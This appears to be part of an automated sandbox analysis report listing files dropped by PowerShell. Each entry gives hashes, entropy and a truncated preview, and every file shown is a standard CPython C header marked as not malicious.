                                                                                                    Preview:/* Cell object interface */....#ifndef Py_LIMITED_API..#ifndef Py_CELLOBJECT_H..#define Py_CELLOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....typedef struct {.. PyObject_HEAD.. /* Content of the cell or NULL when empty */.. PyObject *ob_ref;..} PyCellObject;....PyAPI_DATA(PyTypeObject) PyCell_Type;....#define PyCell_Check(op) Py_IS_TYPE((op), &PyCell_Type)....PyAPI_FUNC(PyObject *) PyCell_New(PyObject *);..PyAPI_FUNC(PyObject *) PyCell_Get(PyObject *);..PyAPI_FUNC(int) PyCell_Set(PyObject *, PyObject *);....static inline PyObject* PyCell_GET(PyObject *op) {.. PyCellObject *cell;.. assert(PyCell_Check(op));.. cell = _Py_CAST(PyCellObject*, op);.. return cell->ob_ref;..}..#define PyCell_GET(op) PyCell_GET(_PyObject_CAST(op))....static inline void PyCell_SET(PyObject *op, PyObject *value) {.. PyCellObject *cell;.. assert(PyCell_Check(op));.. cell = _Py_CAST(PyCellObject*, op);.. cell->ob_ref = value;..}..#define PyCell_SET(op, value) PyCell_SET(_PyO
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1685
                                                                                                    Entropy (8bit):5.26443021799548
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:RfcgTqTjq4egMcfJBMiZaKTRNsdSOu1q4G:RfcIqvq4cchYaR4SVLG
                                                                                                    MD5:C247B66D1DD0BDFE7AA0195519661BC5
                                                                                                    SHA1:D3BF928BC2F1BCCD1E55FC5D79B3C92083F0CAEE
                                                                                                    SHA-256:545146542650C0B962E523D4C83CD2D3A9F5943B5AD75EA3F22AFF15111A25ED
                                                                                                    SHA-512:527FAE338C9656F9DC254339CAF31073A3A7453387938DB0FA9555B3C5F78D50E27BF65A200B01B56582ECF86BFA6DB8E7A276FA4EE996B3212F1FF920ACD300
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_CEVAL_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(void) PyEval_SetProfile(Py_tracefunc, PyObject *);..PyAPI_FUNC(void) PyEval_SetProfileAllThreads(Py_tracefunc, PyObject *);..PyAPI_DATA(int) _PyEval_SetProfile(PyThreadState *tstate, Py_tracefunc func, PyObject *arg);..PyAPI_FUNC(void) PyEval_SetTrace(Py_tracefunc, PyObject *);..PyAPI_FUNC(void) PyEval_SetTraceAllThreads(Py_tracefunc, PyObject *);..PyAPI_FUNC(int) _PyEval_SetTrace(PyThreadState *tstate, Py_tracefunc func, PyObject *arg);..../* Helper to look up a builtin object */..PyAPI_FUNC(PyObject *) _PyEval_GetBuiltin(PyObject *);..PyAPI_FUNC(PyObject *) _PyEval_GetBuiltinId(_Py_Identifier *);../* Look at the current frame's (if any) code's co_flags, and turn on.. the corresponding compiler flags in cf->cf_flags. Return 1 if any.. flag was set, else return 0. */..PyAPI_FUNC(int) PyEval_MergeCompilerFlags(PyCompilerFlags *cf);....PyAPI_FUNC(PyObject *) _PyEval_EvalFrameD
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2316
                                                                                                    Entropy (8bit):5.206587813585113
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5F6eM2GTwXC7hE27Yr+55E9pTRJjR7EGq+JdR7IME1LJH5s9CRyR0TzIS:5keGRT6R1RjbRoZLRyRGf
                                                                                                    MD5:E4CE5AD4B9585885C56F7D40139402E0
                                                                                                    SHA1:37E9DDE5DB6AF688E249FEA775C0DBD8A25EA1DA
                                                                                                    SHA-256:67036807D38844CE2BB25D7BB68D77D82EE27C256E87E6C12E8EB309F8D7B726
                                                                                                    SHA-512:F697A62A6CCC5F17A9097B48929D32CC8C0013ED33584A99EAC6293F656E70DB64978D1F10659BB6EAF8782F28FF9AF3200F2E798CC03AD10BA7A5832960A484
                                                                                                    Malicious:false
                                                                                                    Preview:/* Former class object interface -- now only bound methods are here */..../* Revealing some structures (not for general use) */....#ifndef Py_LIMITED_API..#ifndef Py_CLASSOBJECT_H..#define Py_CLASSOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif....typedef struct {.. PyObject_HEAD.. PyObject *im_func; /* The callable object implementing the method */.. PyObject *im_self; /* The instance it is bound to */.. PyObject *im_weakreflist; /* List of weak references */.. vectorcallfunc vectorcall;..} PyMethodObject;....PyAPI_DATA(PyTypeObject) PyMethod_Type;....#define PyMethod_Check(op) Py_IS_TYPE((op), &PyMethod_Type)....PyAPI_FUNC(PyObject *) PyMethod_New(PyObject *, PyObject *);....PyAPI_FUNC(PyObject *) PyMethod_Function(PyObject *);..PyAPI_FUNC(PyObject *) PyMethod_Self(PyObject *);....#define _PyMethod_CAST(meth) \.. (assert(PyMethod_Check(meth)), _Py_CAST(PyMethodObject*, meth))..../* Static inline functions for direct access to these values... Type checks ar
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16577
                                                                                                    Entropy (8bit):4.753162605991559
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:E6Cj9DR9YePqYgeR/3Fz5+C+Pus1SmlRwjm1K+tiUK72MFjq1ULzx9zCKmSXsso5:un+gqHeR/N5e2DmlRUo71Ix9zCKJo5
                                                                                                    MD5:1BA3E1C8B7F3B32E86912E9716B033B6
                                                                                                    SHA1:C451F33BD817499C5C9FE5BFB631083F7684EB0E
                                                                                                    SHA-256:97437824356AD6332868250B7276172D61F8B67BBEA7B7796E97221AE109FF3E
                                                                                                    SHA-512:99B78835D502526FF045CA1DFFDE52292D802C446EE4F11CECAE0EFC84F518114017CF5451C8FCF6A77565EDD5B13343BC1E21C4386AE5A158552449C9F9EF9A
                                                                                                    Malicious:false
                                                                                                    Preview:/* Definitions for bytecode */....#ifndef Py_LIMITED_API..#ifndef Py_CODE_H..#define Py_CODE_H....#ifdef __cplusplus..extern "C" {..#endif..../* Count of all local monitoring events */..#define _PY_MONITORING_LOCAL_EVENTS 10../* Count of all "real" monitoring events (not derived from other events) */..#define _PY_MONITORING_UNGROUPED_EVENTS 15../* Count of all monitoring events */..#define _PY_MONITORING_EVENTS 17..../* Tables of which tools are active for each monitored event. */../* For 3.12 ABI compatibility this is over sized */..typedef struct _Py_LocalMonitors {.. /* Only _PY_MONITORING_LOCAL_EVENTS of these are used */.. uint8_t tools[_PY_MONITORING_UNGROUPED_EVENTS];..} _Py_LocalMonitors;....typedef struct _Py_GlobalMonitors {.. uint8_t tools[_PY_MONITORING_UNGROUPED_EVENTS];..} _Py_GlobalMonitors;..../* Each instruction in a code object is a fixed-width value,.. * currently 2 bytes: 1-byte opcode + 1-byte oparg. The EXTENDED_ARG.. * opcode allows for larger values
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2729
                                                                                                    Entropy (8bit):5.285712770317982
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:mp2cgBUtRkNT39eEswzixA+yqvqNVJ8Nc36hlI4fmdJ+msra5PKYrFUVdq0RIduc:mocbS539eEBzi+JqvKg6aFfmKm+68nta
                                                                                                    MD5:5949D1A2D57ECDC569772087C656729A
                                                                                                    SHA1:B6180B0749151AC9803FDB7FE8B57F76D6B082CE
                                                                                                    SHA-256:6FC10C4B043E72CFD684D28F3A2227DD29D50AE5632B76F08A1BC73B74814F78
                                                                                                    SHA-512:65B8DD591470CEE8C16BAB7F17FFCC5E54AD0C4A9F300EABBA35690BCCD7D36DD1AE9780908AF2E5DEC514BD3E66E27F47C60B475CAF28DDE323C28D1CF92F17
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_COMPILE_H..# error "this header file must not be included directly"..#endif..../* Public interface */..#define PyCF_MASK (CO_FUTURE_DIVISION | CO_FUTURE_ABSOLUTE_IMPORT | \.. CO_FUTURE_WITH_STATEMENT | CO_FUTURE_PRINT_FUNCTION | \.. CO_FUTURE_UNICODE_LITERALS | CO_FUTURE_BARRY_AS_BDFL | \.. CO_FUTURE_GENERATOR_STOP | CO_FUTURE_ANNOTATIONS)..#define PyCF_MASK_OBSOLETE (CO_NESTED)..../* bpo-39562: CO_FUTURE_ and PyCF_ constants must be kept unique... PyCF_ constants can use bits from 0x0100 to 0x10000... CO_FUTURE_ constants use bits starting at 0x20000. */..#define PyCF_SOURCE_IS_UTF8 0x0100..#define PyCF_DONT_IMPLY_DEDENT 0x0200..#define PyCF_ONLY_AST 0x0400..#define PyCF_IGNORE_COOKIE 0x0800..#define PyCF_TYPE_COMMENTS 0x1000..#define PyCF_ALLOW_TOP_LEVEL_AWAIT 0x2000..#define PyCF_ALLOW_INCOMPLETE_INPUT 0x4000..#define PyCF_COMPILE_MASK (PyCF_ONLY_AST | PyCF_ALLOW_TOP_LEVEL_AWAIT | \..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1292
                                                                                                    Entropy (8bit):5.139223578690183
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:1wxib+xhH30pPiRDd/Of+JxyyYHlyt8zK5qYyN:1cgYw6do+/rYHgt8zEFyN
                                                                                                    MD5:4DFEFE2CF6776C4087A404A44E3ED705
                                                                                                    SHA1:35589BF1FD6E0875F9D6EA438D93431FA803CA6D
                                                                                                    SHA-256:CD2BAB68EC67777D71D1E7EC4D33A2D29F96C5145E33D49E101CCDA692934BAE
                                                                                                    SHA-512:52CD1A6E0F59FA9BA6E6D7B01B13B72B303A54C3B7D4710EF9079B5000A6D25F30D9785392E78BBB7D2559A78C5D4CE830B69A81B083DA96CB0204F7BD540B19
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_COMPLEXOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. double real;.. double imag;..} Py_complex;..../* Operations on complex numbers from complexmodule.c */....PyAPI_FUNC(Py_complex) _Py_c_sum(Py_complex, Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_diff(Py_complex, Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_neg(Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_prod(Py_complex, Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_quot(Py_complex, Py_complex);..PyAPI_FUNC(Py_complex) _Py_c_pow(Py_complex, Py_complex);..PyAPI_FUNC(double) _Py_c_abs(Py_complex);..../* Complex object interface */..../*..PyComplexObject represents a complex number with double-precision..real and imaginary parts...*/..typedef struct {.. PyObject_HEAD.. Py_complex cval;..} PyComplexObject;....PyAPI_FUNC(PyObject *) PyComplex_FromCComplex(Py_complex);....PyAPI_FUNC(Py_complex) PyComplex_AsCComplex(PyObject *op);....#ifdef Py_BUILD_CORE../* Format t
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2043
                                                                                                    Entropy (8bit):5.209648903025274
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:0QHsjzPmEiD5PagHyRj29q/R7v9Dg0Bf9p9qmdfsD0+:VszPmLlPDy1TBL9qmlsD0+
                                                                                                    MD5:8F1D0EE8D5483001F6FF41734F354389
                                                                                                    SHA1:6269AF3AFF52AE81484AF58F948053EB638AB37E
                                                                                                    SHA-256:DAE99CC7F7327EF3E797D5E016B957C6FA3CE4880F4478AC97B206DCE4568259
                                                                                                    SHA-512:7596CE7CCDBAD4AA1B6B328825059B3BD1B27FF8F7626C5C52FD9510AD2B1CD911970DBA63C54ABB5BA7936FE4BED3D86ED7B3F8E36F76E1C3E081B7159FB987
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_LIMITED_API..#ifndef Py_CONTEXT_H..#define Py_CONTEXT_H..#ifdef __cplusplus..extern "C" {..#endif....PyAPI_DATA(PyTypeObject) PyContext_Type;..typedef struct _pycontextobject PyContext;....PyAPI_DATA(PyTypeObject) PyContextVar_Type;..typedef struct _pycontextvarobject PyContextVar;....PyAPI_DATA(PyTypeObject) PyContextToken_Type;..typedef struct _pycontexttokenobject PyContextToken;......#define PyContext_CheckExact(o) Py_IS_TYPE((o), &PyContext_Type)..#define PyContextVar_CheckExact(o) Py_IS_TYPE((o), &PyContextVar_Type)..#define PyContextToken_CheckExact(o) Py_IS_TYPE((o), &PyContextToken_Type)......PyAPI_FUNC(PyObject *) PyContext_New(void);..PyAPI_FUNC(PyObject *) PyContext_Copy(PyObject *);..PyAPI_FUNC(PyObject *) PyContext_CopyCurrent(void);....PyAPI_FUNC(int) PyContext_Enter(PyObject *);..PyAPI_FUNC(int) PyContext_Exit(PyObject *);....../* Create a new context variable..... default_value can be NULL...*/..PyAPI_FUNC(PyObject *) PyContextVar_New(.. const char *nam
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1706
                                                                                                    Entropy (8bit):4.913239676928551
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:0cgl1a/BKr2S03SuCaafSz7iS8SEma4O3:0cx7Sd/Faz7RTB4
                                                                                                    MD5:940E4DB2ACBBFBD91EE392EB0C661202
                                                                                                    SHA1:3531E8AC632E6C609AA5C2158096116D63330205
                                                                                                    SHA-256:F00CA429993329A665C9CD2DE348321712B950B4EFED2E9C05DE6C16EB2E0DDB
                                                                                                    SHA-512:5FFD6B6CC2AE290CF8B745918DFC651A677993617102D91BFEED7B4E7065FA106364306B2D829B14A9FD5A9865FA11D132305DCCB9BB6C6AB240A30FF674A875
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_DESCROBJECT_H..# error "this header file must not be included directly"..#endif....typedef PyObject *(*wrapperfunc)(PyObject *self, PyObject *args,.. void *wrapped);....typedef PyObject *(*wrapperfunc_kwds)(PyObject *self, PyObject *args,.. void *wrapped, PyObject *kwds);....struct wrapperbase {.. const char *name;.. int offset;.. void *function;.. wrapperfunc wrapper;.. const char *doc;.. int flags;.. PyObject *name_strobj;..};..../* Flags for above struct */..#define PyWrapperFlag_KEYWORDS 1 /* wrapper function takes keyword args */..../* Various kinds of descriptor objects */....typedef struct {.. PyObject_HEAD.. PyTypeObject *d_type;.. PyObject *d_name;.. PyObject *d_qualname;..} PyDescrObject;....#define PyDescr_COMMON PyDescrObject d_common....#define PyDescr_TYPE(x) (((PyDescrObject *)(x))->d_type)..#define PyDescr_NAME(x) (((PyDescrObject *)(x))->d_name)....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4804
                                                                                                    Entropy (8bit):5.086936822611704
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:pcTR1vYJuOeuOvuLK/aTVCSl3hioPLCXoLE7PpPq3UDyI8O:GNOsOxO2lh1zCYsRC37I8O
                                                                                                    MD5:C79D4F29F1C2A2FC82AB82FCBFD09F6C
                                                                                                    SHA1:610D12152561D6875BF0E6DE78A3B4F8001F5151
                                                                                                    SHA-256:C7CE4DDA5C84FC6C5DA636F2FDDA42C21B458859E87B8CF6205544A893097D03
                                                                                                    SHA-512:1D51853308CFCD9103893E3286A6C14E84A929B7B1416087CE28FFDE9CEEE9083AA8140F9855155494D0A6195641152E3CAA2B0C99371B7AD1FA6DEBA779CFAC
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_DICTOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct _dictkeysobject PyDictKeysObject;..typedef struct _dictvalues PyDictValues;..../* The ma_values pointer is NULL for a combined table.. * or points to an array of PyObject* for a split table.. */..typedef struct {.. PyObject_HEAD.... /* Number of items in the dictionary */.. Py_ssize_t ma_used;.... /* Dictionary version: globally unique, value change each time.. the dictionary is modified */..#ifdef Py_BUILD_CORE.. uint64_t ma_version_tag;..#else.. Py_DEPRECATED(3.12) uint64_t ma_version_tag;..#endif.... PyDictKeysObject *ma_keys;.... /* If ma_values is NULL, the table is "combined": keys and values.. are stored in ma_keys..... If ma_values is not NULL, the table is split:.. keys are stored in ma_keys and values are stored in ma_values */.. PyDictValues *ma_values;..} PyDictObject;....PyAPI_FUNC(PyObject *) _PyDict_GetIte
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):837
                                                                                                    Entropy (8bit):5.193069954764856
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ljlwxibnNI1NygWEjU3GJLUlnSg7IHBtky:lRcgnNUNIC9d0Sg7IHz5
                                                                                                    MD5:2D0D5860216CE08799A13DDDEE21046E
                                                                                                    SHA1:FE3723823B06A90864E2B44C6EB8AD93E7C1FDE0
                                                                                                    SHA-256:8314B7D514F96FB7212C8DE48443C440D017F25071A81E2DE8734FD354138814
                                                                                                    SHA-512:D2CBEE84891E4200876C2C44C1A920EC5B34F07DD7076A1587D6EAA0507332BD78BCC58BAD0FD1A93E2FA212D44BCBEBC993B5F1C6F69773A6778429BC7E4ECE
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_FILEOBJECT_H..# error "this header file must not be included directly"..#endif....PyAPI_FUNC(char *) Py_UniversalNewlineFgets(char *, int, FILE*, PyObject *);..PyAPI_FUNC(char *) _Py_UniversalNewlineFgetsWithSize(char *, int, FILE*, PyObject *, size_t*);..../* The std printer acts as a preliminary sys.stderr until the new io.. infrastructure is in place. */..PyAPI_FUNC(PyObject *) PyFile_NewStdPrinter(int);..PyAPI_DATA(PyTypeObject) PyStdPrinter_Type;....typedef PyObject * (*Py_OpenCodeHookFunction)(PyObject *, void *);....PyAPI_FUNC(PyObject *) PyFile_OpenCode(const char *utf8path);..PyAPI_FUNC(PyObject *) PyFile_OpenCodeObject(PyObject *path);..PyAPI_FUNC(int) PyFile_SetOpenCodeHook(Py_OpenCodeHookFunction hook, void *userData);....PyAPI_FUNC(int) _PyLong_FileDescriptor_Converter(PyObject *, void *);..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):240
                                                                                                    Entropy (8bit):5.0072586187879855
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:BLgF9ov/HQxz2bBAERZHGdZXGEWyye8Ve67bJRCa8Bpey:BLoU/HQxib2EWbnW7LVPpy
                                                                                                    MD5:77E359584D56C653096E3495E48F2A0A
                                                                                                    SHA1:798CC7DEECC669D96019F53F3C633F78BEAFD8B8
                                                                                                    SHA-256:BFD7F53CBA3C135801C129087BC84866312DD998ED7E1EC13B30CB2A800F3704
                                                                                                    SHA-512:BAB6D1CCA957699CD282E5B1F415FBB92B51AFCE39A3B4B207E155010C34FE4D47AB2E17CF73332D10DA6239941A04C7144317F5436F71DEA927E9D8B5B0EE45
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_FILEUTILS_H..# error "this header file must not be included directly"..#endif....// Used by _testcapi which must not use the internal C API..PyAPI_FUNC(FILE*) _Py_fopen_obj(.. PyObject *path,.. const char *mode);..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):927
                                                                                                    Entropy (8bit):5.231380546122055
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:tJwxib+xsyyxV1VsHTmRBaqOm7q7mrPEWPhIWPj:tJcgYsxxrVszmRBafUI0PEWPeWPj
                                                                                                    MD5:8B73393791F403ED0A20F9DF6BA63D52
                                                                                                    SHA1:38449C1812FD8BF0E601C97D4D35DD41355B7E33
                                                                                                    SHA-256:DCE978016FA9D32AD9F3679C9B1B6E614B727B323B2527E0298F23331DAC804B
                                                                                                    SHA-512:88FB37C3AE0A8C68247FF739BD51BDA604A99EEF50EB0ECDD8A4D19022428B4C9E91B072A6B45C2C2254D92FB7B6CEA8A372E6F568925DF278CEA348616A02F3
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_FLOATOBJECT_H..# error "this header file must not be included directly"..#endif....typedef struct {.. PyObject_HEAD.. double ob_fval;..} PyFloatObject;....#define _PyFloat_CAST(op) \.. (assert(PyFloat_Check(op)), _Py_CAST(PyFloatObject*, op))....// Static inline version of PyFloat_AsDouble() trading safety for speed...// It doesn't check if op is a double object...static inline double PyFloat_AS_DOUBLE(PyObject *op) {.. return _PyFloat_CAST(op)->ob_fval;..}..#define PyFloat_AS_DOUBLE(op) PyFloat_AS_DOUBLE(_PyObject_CAST(op))......PyAPI_FUNC(int) PyFloat_Pack2(double x, char *p, int le);..PyAPI_FUNC(int) PyFloat_Pack4(double x, char *p, int le);..PyAPI_FUNC(int) PyFloat_Pack8(double x, char *p, int le);....PyAPI_FUNC(double) PyFloat_Unpack2(const char *p, int le);..PyAPI_FUNC(double) PyFloat_Unpack4(const char *p, int le);..PyAPI_FUNC(double) PyFloat_Unpack8(const char *p, int le);..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1137
                                                                                                    Entropy (8bit):4.903757833245492
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:GSqgwxibULip8ph97UX412U1YxYDKoO2TdGPzGlWmRl:GS7cgUumpouXeoDToz+Vb
                                                                                                    MD5:5902B4A048F6428560A52A912B569AE7
                                                                                                    SHA1:A565C1F713426F2D1CFF116395DBF9CA2C74E0E2
                                                                                                    SHA-256:833C2CA6C489103C63DAA9701D2A3BD11E2EA14BAEB537A61D4CAB5D50493A7C
                                                                                                    SHA-512:AC1F95FE7F017614B0BEDBED0B90AC829FD10A56D156310ECB3032CCF0180D8C5F61570FB8FAB873AB82853BDFCD858F70C8647FED7F052A025E574830E5B232
                                                                                                    Malicious:false
                                                                                                    Preview:/* Frame object interface */....#ifndef Py_CPYTHON_FRAMEOBJECT_H..# error "this header file must not be included directly"..#endif..../* Standard object interface */....PyAPI_FUNC(PyFrameObject *) PyFrame_New(PyThreadState *, PyCodeObject *,.. PyObject *, PyObject *);..../* The rest of the interface is specific for frame objects */..../* Conversions between "fast locals" and locals in dictionary */....PyAPI_FUNC(void) PyFrame_LocalsToFast(PyFrameObject *, int);..../* -- Caveat emptor --.. * The concept of entry frames is an implementation detail of the CPython.. * interpreter. This API is considered unstable and is provided for the.. * convenience of debuggers, profilers and state-inspecting tools. Notice that.. * this API can be changed in future minor versions if the underlying frame.. * mechanism change or the concept of an 'entry frame' or its semantics becomes.. * obsolete or outdated. */....PyAPI_FUNC(int) _PyFrame_IsEntryFrame(PyFrameObjec
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7338
                                                                                                    Entropy (8bit):5.1622423296866335
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:96qUpUfRKIR1jIRwvIRhAtIRg2IR4KIRR1IR+Faa8Z:gqUORKK1jKwvKWtKg2K4KKR1K+Fal
                                                                                                    MD5:F7ACA6238FFFCECE1F959EB7FB7F91D1
                                                                                                    SHA1:F4571B635B99D8DEB3011B50C321B220B25897FD
                                                                                                    SHA-256:F5C7DC476D9420E43424197F20F700072A2FDB7315D299E9E460A912CEE62939
                                                                                                    SHA-512:7A5D7F918DF72D0B14AC3D711558098BB70B95AFC9574E0FE649AB288954CA86582148B766F6502F936250CBCB7392397C177A5CA84455FAE1045FB69DFF957C
                                                                                                    Malicious:false
                                                                                                    Preview:/* Function object interface */....#ifndef Py_LIMITED_API..#ifndef Py_FUNCOBJECT_H..#define Py_FUNCOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif......#define COMMON_FIELDS(PREFIX) \.. PyObject *PREFIX ## globals; \.. PyObject *PREFIX ## builtins; \.. PyObject *PREFIX ## name; \.. PyObject *PREFIX ## qualname; \.. PyObject *PREFIX ## code; /* A code object, the __code__ attribute */ \.. PyObject *PREFIX ## defaults; /* NULL or a tuple */ \.. PyObject *PREFIX ## kwdefaults; /* NULL or a dict */ \.. PyObject *PREFIX ## closure; /* NULL or a tuple of cell objects */....typedef struct {.. COMMON_FIELDS(fc_)..} PyFrameConstructor;..../* Function objects and code objects should not be confused with each other:.. *.. * Function objects are created by the execution of the 'def' statement... * They reference a code object in their __code__ attribute, which is a.. * purely syntactic object, i.e. nothing more than a compiled version of some.. * source
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3405
                                                                                                    Entropy (8bit):4.675583115077192
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:7XhUlI/VuHcOaobPC7fI2jyYtkFrhvr3BLy4:z8yVAiWPUzTtkf7
                                                                                                    MD5:7823F44F066C4E51523A90ECA985F807
                                                                                                    SHA1:40DFB3E3489BC4B0AF7204CE70C7BAC6A5A143AC
                                                                                                    SHA-256:64BE4324F7F9A09E46DBC9997085B04B0B32537A08837073A95BEB2FF4ABCDBA
                                                                                                    SHA-512:9AB4A28BE2C0258BCDCF79A625AE91F9D40849F0B53B48FA73C5C6F4B22E6C203C2AA6F66E61D6372DCBD818C0721D55E16943B583BAC1BC9BEC5B4D167691C7
                                                                                                    Malicious:false
                                                                                                    Preview:/* Generator object interface */....#ifndef Py_LIMITED_API..#ifndef Py_GENOBJECT_H..#define Py_GENOBJECT_H..#ifdef __cplusplus..extern "C" {..#endif..../* --- Generators --------------------------------------------------------- */..../* _PyGenObject_HEAD defines the initial segment of generator.. and coroutine objects. */..#define _PyGenObject_HEAD(prefix) \.. PyObject_HEAD \.. /* List of weak reference. */ \.. PyObject *prefix##_weakreflist; \.. /* Name of the generator. */ \.. PyObject *prefix##_name; \.. /* Qualified name of the generator. */ \.. PyObject *prefix##_qualname; \.. _PyErr_StackItem prefix##_exc_state;
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1669
                                                                                                    Entropy (8bit):5.0202452456319815
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:/wxibOvcHWcJQx1cof1ofBRYgGlw1svu4GRfco4G2aJaGR11k:/cgOvl3x1h9EewXeCpk
                                                                                                    MD5:A6CB48CC7E0F692D2FC13A1976E6926D
                                                                                                    SHA1:458F01E4BF7F68B5A806392746E723F576CF450F
                                                                                                    SHA-256:2233CC06D149A194C2185D5C3DB82256833459C51902AE0DF5CD237A6973CB97
                                                                                                    SHA-512:CF2AB21B74D04712D08089036D73F90C605FF3CDD349E628D97B8325A85F3E935CEC48C3D4AF911BE07A5489A21A7742F1C476242C81806C0AE2F4D9C75AC590
                                                                                                    Malicious:false
                                                                                                    Preview:#ifndef Py_CPYTHON_IMPORT_H..# error "this header file must not be included directly"..#endif....PyMODINIT_FUNC PyInit__imp(void);....PyAPI_FUNC(int) _PyImport_IsInitialized(PyInterpreterState *);....PyAPI_FUNC(PyObject *) _PyImport_GetModuleId(_Py_Identifier *name);..PyAPI_FUNC(int) _PyImport_SetModule(PyObject *name, PyObject *module);..PyAPI_FUNC(int) _PyImport_SetModuleString(const char *name, PyObject* module);....PyAPI_FUNC(void) _PyImport_AcquireLock(PyInterpreterState *interp);..PyAPI_FUNC(int) _PyImport_ReleaseLock(PyInterpreterState *interp);....PyAPI_FUNC(int) _PyImport_FixupBuiltin(.. PyObject *mod,.. const char *name, /* UTF-8 encoded string */.. PyObject *modules.. );..PyAPI_FUNC(int) _PyImport_FixupExtensionObject(PyObject*, PyObject *,.. PyObject *, PyObject *);....struct _inittab {.. const char *name; /* ASCII encoded string */.. PyObject* (*initfunc)(void);..};..// This is not used a
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8076
                                                                                                    Entropy (8bit):5.025788943646213
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:iauwyXtV/fW/VTKNBfwKdfNy+1yQfAH+E22i+xO+haFl/8RCFtCFSkcr0p1u7VOi:B+ZmK3FyXK21Hfu7VTH0e
                                                                                                    MD5:E785460D0437E300AAE9CC595A419D13
                                                                                                    SHA1:65BA8DEB5F4307C99B70AF112557FACD335997FE
                                                                                                    SHA-256:0B77B3C209F8D212D75416338B7E519ECD37D33CC8EF11F4564D64662D59EFE1
                                                                                                    SHA-512:CB5807FEACBAF258A1909AF7CB289624E66EF076F39CFE33819CA505C171C0D610B675CD63C8D80B267A0CE08E887F53B630218E81F12D61E2903D6F5A59106D
                                                                                                    Malicious:false
